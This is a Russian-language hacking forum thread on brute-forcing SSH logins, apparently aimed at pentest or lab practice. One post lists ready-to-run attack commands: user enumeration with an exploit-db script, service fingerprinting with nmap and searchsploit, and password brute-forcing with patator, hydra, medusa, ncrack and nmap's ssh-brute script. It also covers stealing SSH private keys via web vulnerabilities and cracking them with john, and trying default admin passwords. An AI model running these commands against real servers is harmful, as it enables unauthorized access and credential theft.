ssh брут
- Автор темы Dogoda
- Дата начала
Exited3n
Red Team
- 10.05.2022
- 793
- 267
Crazy Jack
Well-known member
- 08.07.2017
- 573
- 86
Rukh
Green Team
- 04.05.2022
- 18
- 4
Если будет интересно, распишу подробнее в какой-нить статье.
Ниже то, что стоит проработать.
- используемые wordlists выбираются индивидуально. Для того, чтобы посмотреть, что у вас есть в системе, наберите
Вам пригодятся те, что с passwords и usernames. Можно самому делать словари, crunch -
Отдельно вот Вам
1) Перебор пользователей
2) Граб служб (например ответом может быть: SSH-2.0-OpenSSH_3.9p1 )
- далее можно искать через
- порт ssh не только 22
3) Patator - имеет модуль ssh_login
4) Hydra -
5) Mesuza - имеет модуль ssh.mod
6) Ncrack -
7) nmap (zenmap тоже самое) -
---
Помните, что брут - это гадость, которая делается, когда Вы точно попробовали всё остальное.
Ниже то, что стоит проработать.
- используемые wordlists выбираются индивидуально. Для того, чтобы посмотреть, что у вас есть в системе, наберите
locate wordlist --> отобразится большой список файлов со словом wordlistВам пригодятся те, что с passwords и usernames. Можно самому делать словари, crunch -
Ссылка скрыта от гостей
Отдельно вот Вам
Ссылка скрыта от гостей
на списки1) Перебор пользователей
python /usr/share/exploitdb/exploits/linux/remote/40136.py -U /usr/share/seclists/Usernames/Names/names.txt 10.10.1.12) Граб служб (например ответом может быть: SSH-2.0-OpenSSH_3.9p1 )
- далее можно искать через
searchsploit OpenSSH 3.9p1 рекомендации.nmap -sV -p 22 10.10.1.1 . Позже можно глянуть что такое RustScan - ссыль- порт ssh не только 22
3) Patator - имеет модуль ssh_login
Ссылка скрыта от гостей
patator ssh_login host=10.10.1.1 user=FILE0 0=user.txt password=FILE1 1=pass.txt4) Hydra -
Ссылка скрыта от гостей
hydra -l admin -P <passlist.txt> 10.10.1.1 -t 4 sshhydra -L <userlist.txt> -P <passlist.txt> 10.10.1.1 ssh5) Mesuza - имеет модуль ssh.mod
Ссылка скрыта от гостей
medusa -h 10.10.1.1 -U userlist.txt -P passlist.txt -M ssh6) Ncrack -
Ссылка скрыта от гостей
ncrack –v –U userlist.txt –P passlist.txt 10.10.1.1:227) nmap (zenmap тоже самое) -
Ссылка скрыта от гостей
nmap 10.10.1.1 -p 22 --script ssh-brute --script-args userdb=userlist.txt,passdb=passlist.txt---
Помните, что брут - это гадость, которая делается, когда Вы точно попробовали всё остальное.
- Собственно, всё остальное: LFI, RFI, IDOR, XXE, SSRF, XSS, CSRF и пр.
- Также можно получить логины пароли из БД, т.к. часто логины-пароли могут совпадать с основной системой. Это уже с помощью sql-приблуд.
- Пробуйте в админках дефолтные для cms данные для ввода, люди ленивы.
- Возможно до брута получится через уязвимости в вебе сайта получить rsa ключи.
- По умолчанию лежат здесь:
$user/.ssh/id_rsa$user/.ssh/authorized key- Брутятся rsa с помощью john the ripper /usr/share/john/ssh2john.py
Ссылка скрыта от гостей
- По умолчанию лежат здесь:
AbuPushka
New member
- 21.07.2022
- 1
- 0
как освоишься с hydra, можешь переходить к patator, он более гибкий для работы в будущем
Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab
Похожие темы
- Статья
Hacker Lab
Категории
Наши курсы
